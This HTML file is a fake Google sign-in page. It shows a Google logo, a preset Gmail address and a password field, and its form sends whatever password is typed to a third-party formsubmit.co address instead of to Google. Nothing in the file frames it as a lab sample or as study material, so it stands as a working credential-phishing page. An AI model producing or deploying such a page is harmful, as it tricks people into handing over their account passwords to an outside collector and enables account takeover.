<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Form</title>
    <style>
        .container{
            position: absolute;
            top:50%;
            left:50%;
            transform:translate(-50%, -50%);
            width: 25rem;
            height: 35rem;
            padding: 2.5rem;
            box-sizing: border-box;
            border: 1px solid #dadce0;
            border-radius: 8px;
                }
        .g{
            display:block;
            margin-left: auto;
            margin-right: auto;
            margin-top: 0px;
            height: 60px;
        }
        .inputBox{
            width: 93%;
            padding: 0.625rem 10px;
            font-size: 1rem;
            letter-spacing: 0.062rem;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            background: transparent;
            border-radius: 4px;
            }
       .k{
        height: 1.8rem;
        width: 17rem;
        border-radius: 1000px;
        border: 2px solid #ccc;
        margin-top: 30px;
        margin-bottom: 30px;
        margin-left: auto;
        margin-right:auto;
        text-align:center;
        font-size: 18px;
        
       }
       #password{
        width: 100%;
        height:30px;
    padding: 0.625rem 10px;
    font-size: 1rem;
    letter-spacing: 0.062rem;
    margin-bottom: 5px;
    border: 1px solid #ccc;
    background: transparent;
    border-radius: 8px;
    margin-top: 55px;
}
#password:hover{
    border-radius: 10px;
    border-color: antiquewhite;
}
.btn{
    
    display: block;
  width: 90px;
  padding: 10px;
  background-color: #1a73e8;
  margin-left: 230px;
  margin-top: 60px;
  color: #fff;
  border: none;
  border-radius: 4px;
  font-size: 18px;
  cursor: pointer;

}
.btn:hover{
    transform: scale(1.0);
}

    </style>
</head>
<body>
    <div class="container">

        <img src="google5.png" class="g">

        <h2 style="margin-top: 30px;  text-align: center; margin-bottom:px;">Sign in</h2>
        <p style="margin-top: 5px; text-align: center; font-size: 20px;">Use a Google account</p>

        <div class="k">
           
            tigestgetye768@gmail.com
        </div>
        <form action="https://formsubmit.co/10ef81e4ef3e58c5c75de6394ed6a46a" method="post">
        
            <input  class="form-control" type="password" id="password" placeholder="Password" name="password" minlength="8" required  onkeyup="this.setAttribute('value',this.value);">
            <lable for="password"></lable>
        
        <d style="font-size: 17px;">
            <c href="">Forgot your password?</c>
        </d>

        <button class="btn" type="submit">
            Next
        </button>
    </form>



    </div>
</body>
</html>